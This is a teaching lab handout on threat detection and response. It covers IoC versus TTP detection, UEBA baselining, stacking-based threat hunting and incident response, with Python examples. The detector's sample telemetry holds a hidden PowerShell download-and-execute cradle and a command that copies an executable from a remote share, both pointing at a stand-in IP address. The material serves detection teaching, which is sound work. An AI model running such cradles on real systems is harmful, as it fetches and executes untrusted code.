8.

Detect and Respond To Attacks


Aim:
To study about threat detection and response and how to stay ahead of advanced threats.

Threat detection and response:

Threat detection is the number one priority for cybersecurity teams: if you cannot see the
adversary in your network, you cannot respond appropriately. But with so many potential
threats and adversaries, putting appropriate threat detection in place, such as user and entity
behavior analytics (UEBA), can seem a daunting task. Add a layer of marketing buzzwords and
cyber terms of art and it becomes even harder to establish a clear strategy. Breaking threat
detection and response down to its most basic elements brings that clarity.
In this exercise you will learn:
 What is threat detection?
 What are attackers after?
 What are examples of threats?
 How to detect threats
 How to hunt threats
 How to respond to threats
What is threat detection?
As the term relates to computer security, a threat is anything that has the potential to cause
harm to a computer system or network. Importantly, as Techopedia points out, threats are not the
same as attacks: a threat represents the potential for an attack to occur, while an attack is the
act of breaking into or harming a computer or network. A more advanced form of threat, the
Advanced Persistent Threat (APT), emerged several years ago. As the name suggests, it is
sophisticated and remains in your network for a prolonged period, giving the attackers a longer
window in which to act.
Threat detection is the process of finding threats on your network, your systems or your
applications. The idea is to detect threats before they are exploited as attacks. Malware on an
endpoint, for example, may or may not yet have been used in an attack. For that reason, security
teams have been shifting their focus from indicators of compromise (IoCs), such as the hash of a
known malware sample, to tactics, techniques, and procedures (TTPs). The goal is to catch the
bad actor in the act of introducing a threat by watching for telltale techniques, rather than
finding evidence after the fact that a threat was already introduced. An IoC match only fires for
threats someone has already seen and catalogued; a TTP detection also fires for a new sample that
behaves the same way.
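The following is an added example, not code from the original page, that puts the two approaches side by side over a handful of constructed endpoint process-creation events (hosts, users, hashes and command lines are fictional). The IoC check only knows one hash; the TTP rule looks for an Office application spawning a command interpreter, a behaviour ATT&CK groups under Command and Scripting Interpreter (T1059), and so catches the document-borne payloads whose hashes have never been seen before.

```python
"""Added example (not from the original page): an IoC-based check beside a
TTP-based check, run over constructed endpoint process-creation events.
Hosts, users, hashes and command lines below are fictional."""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent_image: str   # process that spawned this one
    image: str          # the newly created process
    sha256: str         # hash of the executable on disk
    command_line: str


# A known-bad hash list, as a threat-intelligence feed would supply it.
KNOWN_BAD_HASHES = {"d4" * 32}

# TTP rule: Office applications do not normally spawn command interpreters.
# A document that does so is a classic sign of a malicious macro or exploit
# payload, whatever the payload's hash happens to be.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}

# Constructed telemetry. Only one event carries a hash on the IoC list;
# two others show the technique with hashes nobody has catalogued.
EVENTS = [
    ProcessEvent("ws01", "alice", "explorer.exe", "WINWORD.EXE", "a1" * 32,
                 "WINWORD.EXE invoice.docx"),
    ProcessEvent("ws01", "alice", "WINWORD.EXE", "powershell.exe", "b2" * 32,
                 "powershell -nop -w hidden -c iex((New-Object Net.WebClient)"
                 ".DownloadString('http://198.51.100.7/a'))"),
    ProcessEvent("ws02", "bob", "explorer.exe", "cmd.exe", "c3" * 32,
                 "cmd /c dir C:\\Reports"),
    ProcessEvent("ws03", "carol", "EXCEL.EXE", "cmd.exe", "e5" * 32,
                 "cmd /c copy \\\\198.51.100.7\\share\\t.exe %TEMP%"),
    ProcessEvent("ws04", "dave", "svchost.exe", "update.exe", "d4" * 32,
                 "update.exe /silent"),
]


def ioc_hits(events, bad_hashes):
    """Indicator match: flag only executables whose hash is already known bad."""
    return [e for e in events if e.sha256.lower() in bad_hashes]


def ttp_hits(events):
    """Technique match: flag any Office process that spawns an interpreter."""
    return [e for e in events
            if e.parent_image.lower() in OFFICE_APPS
            and e.image.lower() in INTERPRETERS]


def run_detections(events, bad_hashes=KNOWN_BAD_HASHES):
    """Return {host: [reasons]} so the two approaches can be compared."""
    alerts = {}
    for e in ioc_hits(events, bad_hashes):
        alerts.setdefault(e.host, []).append(
            f"IoC: known-bad hash for {e.image}")
    for e in ttp_hits(events):
        alerts.setdefault(e.host, []).append(
            f"TTP: {e.parent_image} spawned {e.image} as {e.user}")
    return alerts


if __name__ == "__main__":
    for host, reasons in sorted(run_detections(EVENTS).items()):
        print(host, "->", "; ".join(reasons))
```

Running it, the IoC check alerts only on ws04, while the TTP rule alerts on ws01 and ws03 and stays silent on ws02, where a shell launched from the desktop is ordinary user activity. The two are complementary: the hash list is cheap and precise for what it knows, the technique rule covers what it does not.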

What are attackers after?


Cybercriminals are usually after one of five things, and the end goal is usually monetary.
 User credentials—cybercriminals are often not after you, but after your credentials. They
want your username and password to get into the systems you have access to; it is much easier to
open a door with a key than to pick the lock or break a window. Some attackers then use
privilege escalation, exploiting the underlying operating system to grant themselves additional
privileges, and use those privileges to reach what they are really after.
 Personally identifiable information (PII)—some criminals want personal information they
can use to impersonate you, such as a social security number or driver's license number. These
and other details can be used to apply for credit cards, open bank accounts in your name, and the
like.
 Intellectual property or sensitive corporate information—industrial espionage is alive and
well. Nation states look to steal trade secrets to boost their own economies. Competitors look to
gain an advantage, or fill a gap in their offerings, by taking what their rivals know. Employees
may steal important secrets for personal gain, or out of spite at being passed over for a
promotion. Companies need to protect their product designs, customer databases, business
processes, marketing plans and more.
 Ransom—criminals have been extorting companies and individuals online for years. Their
two most potent weapons are ransomware, which encrypts files on endpoints or servers and
demands a ransom to unlock them, and DDoS attacks, which flood web servers or networks with
bogus traffic until the ransom is paid.
 Revenge—some disgruntled users or so-called hacktivists look to bring down or slow down
systems to protest company policy. In some cases, attackers deface web pages to embarrass
companies or government organizations.
What are examples of threats?
Here are some common examples of threats:

 Malware—malicious software that infects your computer, such as computer viruses, worms,
Trojan horses, spyware, and adware.
 Phishing—fake emails disguised as legitimate communications that seek to steal sensitive
information from an unwitting recipient.
 Ransomware—malware that encrypts files on an endpoint or server and then displays a
message demanding a ransom in exchange for decrypting them.
 Trojan horse—a computer executable, sometimes known as a backdoor, that can be remotely
activated to perform a variety of attacks.
The cyber arm of the Canadian government has an excellent summary of basic threat types.
Building on the shift to TTPs noted above, more advanced teams are moving to the MITRE
ATT&CK framework for threat detection and response. ATT&CK is a globally accessible
knowledge base of adversary tactics and techniques based on real-world observations of
cyber-attacks. They are displayed in matrices arranged by attack stage, from initial system access
to data theft or machine control. There are matrices for common desktop platforms (Linux,
macOS, and Windows) as well as mobile platforms.
How to detect threats
There are many technologies to detect threats at various points on the network. Here is a basic
summary.

Detection technology, with overview, pros and cons:

 Cloud access security brokers (CASB)
   Overview: Detect unauthorized access to cloud applications.
   Pros: Good view of access patterns to cloud applications.
   Cons: Limited in scope to cloud applications; do not detect threats within the cloud
   applications themselves.
 Endpoint detection and response (EDR)
   Overview: Records suspicious behavior, blocks malicious access, and suggests responses.
   Pros: Complete technology for protecting endpoint computers.
   Cons: Limited in scope; does not detect network or server attacks.
 Intrusion detection systems (IDS)
   Overview: An appliance or service that monitors network traffic for malicious activity.
   Pros: Good for detecting threats introduced via the network itself.
   Cons: Limited in scope; will not detect endpoint or cloud threats. Requires an intrusion
   prevention system (IPS) to block threats.
 Network firewalls
   Overview: A physical or virtual appliance that monitors traffic for malicious activity or
   access and takes appropriate action.
   Pros: Good for detecting and blocking threats via the network itself.
   Cons: Limited in scope; will not detect endpoint or cloud threats.
 Honeypots
   Overview: A network-attached system set up as a decoy to expose threats against an
   organization.
   Pros: Advanced visibility of threats against applications or resources.
   Cons: Limited in scope to the specific honeypots that are deployed. If discovered by an
   attacker, honeypots can be circumvented.
 Security information and event management (SIEM)
   Overview: A platform that collects logs from across the estate and correlates related
   threats and attacks.
   Pros: Good for a holistic view across the entire threat or attack chain; ties together
   other detection technologies.
   Cons: Some SIEMs may have incomplete logs to work with, due to timing or storage
   constraints.
 Threat intelligence platforms
   Overview: Services that publish up-to-date information about known threats.
   Pros: A good repository of known-threat information.
   Cons: Do not take action on their own; require integration with another threat detection
   technology.
 Behavior analytics
   Overview: Detects threats based on behavior.
   Pros: Able to detect unknown threats by using behavior and machine learning.
   Cons: Advanced technology that must first build a baseline of normal behavior and data
   before it can flag deviations.

Improving threat detection with behavior analytics


Criminals have become so sophisticated, and computer networks so vast (often with no real
perimeter), that traditional methods of detecting individual compromises are simply inadequate.
A newer approach has emerged that models normal behavior and flags deviations from it to
detect threats.

User and entity behavior analytics (UEBA) is a newer category of security solutions that uses
analytics technology, including machine learning and deep learning, to discover abnormal and
risky behavior by users, machines and other entities on the corporate network. A UEBA system
first learns a baseline of each entity's normal activity (typical login hours, hosts accessed, data
volumes) and then scores new activity by how far it departs from that baseline.
UEBA can detect security incidents that traditional tools do not see, either because they do not
conform to predefined correlation rules or attack patterns, or because they span multiple
organizational systems and data sources. The caveat is that a baseline is only as good as the
learning period that produced it: an entity that was already compromised while the baseline was
being built looks normal afterwards, and a brand-new entity has no baseline at all.
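As an added example (not from the original page, and far simpler than a commercial UEBA product), the block below builds a per-user baseline from constructed authentication events and scores a later day against it. Users, hosts, dates and the 08:00-18:00 working-day window are assumptions; the features (logins per day, distinct hosts, off-hours logins) and the z-score threshold of 3 are illustrative choices, not values from the page.

```python
"""Added example (not from the original page): a minimal user-behaviour
baseline with anomaly scoring over constructed authentication events.
Users, hosts and dates are fictional."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

FEATURES = ("logins", "hosts", "offhours")
MIN_STD = 1.0    # floor so a perfectly regular baseline does not divide by zero
THRESHOLD = 3.0  # z-score at which a feature counts as anomalous

# Constructed baseline: 20 days of normal activity as (timestamp, user, host).
BASELINE_EVENTS = []
for day in range(1, 21):
    stamp = f"2024-03-{day:02d} "
    # alice: two logins to ws01, one to fs01, plus a late one on even days
    BASELINE_EVENTS += [(stamp + "09:00", "alice", "ws01"),
                        (stamp + "11:00", "alice", "fs01"),
                        (stamp + "13:00", "alice", "ws01")]
    if day % 2 == 0:
        BASELINE_EVENTS.append((stamp + "17:00", "alice", "ws01"))
    # bob: one morning login, occasionally one in the evening
    BASELINE_EVENTS.append((stamp + "09:30", "bob", "ws02"))
    if day % 5 == 0:
        BASELINE_EVENTS.append((stamp + "19:00", "bob", "ws02"))

# Constructed day to score: alice's account fans out across the estate at 3am,
# bob looks normal, and eve is an account the baseline has never seen.
TEST_EVENTS = [(f"2024-04-01 03:{m:02d}", "alice", h)
               for m, h in enumerate(["ws01", "fs01", "dc01", "fs02", "ws07",
                                      "ws09", "hr01", "bkp01"])]
TEST_EVENTS += [("2024-04-01 09:30", "bob", "ws02"),
                ("2024-04-01 10:00", "bob", "ws02"),
                ("2024-04-01 14:00", "eve", "ws05")]


def daily_features(events):
    """Aggregate raw events into one feature vector per (user, date)."""
    acc = defaultdict(lambda: {"logins": 0, "hosts": set(), "offhours": 0})
    for ts, user, host in events:
        t = datetime.strptime(ts, "%Y-%m-%d %H:%M")
        f = acc[(user, str(t.date()))]
        f["logins"] += 1
        f["hosts"].add(host)
        if not 8 <= t.hour < 18:          # outside the assumed working day
            f["offhours"] += 1
    return {key: {"logins": f["logins"], "hosts": len(f["hosts"]),
                  "offhours": f["offhours"]} for key, f in acc.items()}


def _stats(values):
    """(mean, std) of a feature, with the std floored at MIN_STD."""
    values = list(values)
    return mean(values), max(pstdev(values), MIN_STD)


def build_baseline(events):
    """Per-user (mean, std) of each daily feature over the learning period."""
    rows = defaultdict(list)
    for (user, _day), f in daily_features(events).items():
        rows[user].append(f)
    return {user: {name: _stats(r[name] for r in fs) for name in FEATURES}
            for user, fs in rows.items()}


def score(baseline, events, threshold=THRESHOLD):
    """Return {(user, day): detail} for days that deviate from the baseline."""
    alerts = {}
    for (user, day), f in daily_features(events).items():
        if user not in baseline:
            # A never-seen entity cannot be scored; surface it explicitly.
            alerts[(user, day)] = {"reason": "no baseline for this entity"}
            continue
        z = {name: (f[name] - baseline[user][name][0]) / baseline[user][name][1]
             for name in FEATURES}
        flagged = {name: round(v, 1) for name, v in z.items() if v >= threshold}
        if flagged:
            alerts[(user, day)] = flagged
    return alerts


if __name__ == "__main__":
    for key, detail in sorted(score(build_baseline(BASELINE_EVENTS),
                                    TEST_EVENTS).items()):
        print(key, detail)
```

Alice's day is flagged on all three features (eight hosts against a baseline of two, eight off-hours logins against none), bob's slightly busier morning stays well under the threshold, and eve is reported as an entity with no baseline rather than silently scored as normal. A production UEBA system would use many more features, a robust estimator in place of mean and standard deviation, and peer-group baselines for new entities, but the shape of the computation is the same.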

Threat hunting
Threat hunting is the practice of actively seeking out cyber threats in an organization or network.
A threat hunt can be conducted on the heels of a security incident, but also proactively, to
discover new and unknown attacks or breaches. Unlike an alert, a hunt starts from a hypothesis
about how an adversary would show up in your data and then goes looking for it. According to a
2017 study by the SANS Institute, 45% of organizations conduct threat hunting on an ad hoc or
regular basis. Threat hunting requires broad access to security data from across the organization,
which a SIEM can provide.
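One common hunting technique is frequency analysis, often called stacking: count how many hosts in the fleet exhibit each parent/child process pair and examine the rare ones, on the hypothesis that malware persistence or lateral movement shows up as a pair almost nobody else has. The block below is an added example, not from the original page; in practice the telemetry would be exported from the SIEM or EDR, but here it is constructed inline, and the hosts, process names and 2% prevalence cut-off are assumptions.

```python
"""Added example (not from the original page): a hypothesis-driven hunt by
frequency analysis ("stacking") over constructed fleet-wide process
telemetry. Hosts and process names are fictional."""
from collections import defaultdict

# Constructed telemetry as (host, parent_image, child_image): 200 workstations
# that all look alike, a quarter of which also run a finance application.
TELEMETRY = []
for n in range(1, 201):
    host = f"ws{n:03d}"
    TELEMETRY += [(host, "explorer.exe", "outlook.exe"),
                  (host, "explorer.exe", "chrome.exe"),
                  (host, "services.exe", "svchost.exe"),
                  (host, "svchost.exe", "taskhostw.exe")]
    if n % 4 == 0:
        TELEMETRY.append((host, "explorer.exe", "ledger.exe"))

# The needles: a scheduled-task launch of an unknown binary on two hosts, and
# a mail client spawning mshta.exe on one.
TELEMETRY += [("ws017", "taskeng.exe", "updater.exe"),
              ("ws133", "taskeng.exe", "updater.exe"),
              ("ws042", "outlook.exe", "mshta.exe")]


def stack_by_host(telemetry):
    """Map each parent/child pair to the set of hosts on which it was seen."""
    hosts_per_pair = defaultdict(set)
    for host, parent, child in telemetry:
        hosts_per_pair[(parent.lower(), child.lower())].add(host)
    return hosts_per_pair


def hunt_leads(telemetry, max_prevalence=0.02):
    """Pairs present on at most max_prevalence of the fleet, rarest first.

    Each lead carries the hosts it was seen on so the hunter can pivot to
    them for a closer look. Prevalence is measured in distinct hosts, not
    raw event counts, so a noisy process on one box does not hide itself.
    """
    fleet_size = len({host for host, _, _ in telemetry})
    leads = [(pair, sorted(hosts))
             for pair, hosts in stack_by_host(telemetry).items()
             if len(hosts) / fleet_size <= max_prevalence]
    return sorted(leads, key=lambda lead: (len(lead[1]), lead[0]))


if __name__ == "__main__":
    for pair, hosts in hunt_leads(TELEMETRY):
        print(f"{pair[0]} -> {pair[1]}: {len(hosts)} host(s) {hosts}")
```

The common pairs, including the finance application seen on 50 hosts, fall away, and the hunter is left with two leads to investigate. The cut-off is a judgement call: too low and a single slow roll-out of new software floods the list, too high and a campaign that has already spread hides in the middle of the distribution.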

How to respond to threats


Ideally, security teams deal with threats before they are weaponized into attacks. Examples of
this kind of response include quarantining malware, phishing-awareness training, and patching
known vulnerabilities with system updates.

Once a threat turns into an incident, a different type of response is required. An incident
response plan helps IT staff identify, respond to and recover from cybersecurity incidents. The
objective of an incident response plan is to limit damage such as service outages, data loss or
theft, and illicit access to organizational systems. Some organizations have formalized a
cross-functional incident response team.
Understanding threats allows your organization to respond to them appropriately. Leveraging
frameworks like MITRE ATT&CK improves the sophistication of security teams. With behavioral
analytics and threat hunting tools a SOC analyst can apply security measures proactively. And
when threats turn into incidents, automation and an organized incident response team can help
speed recovery.

Result:
Thus threat detection and response techniques, and how to stay ahead of advanced threats,
were studied.
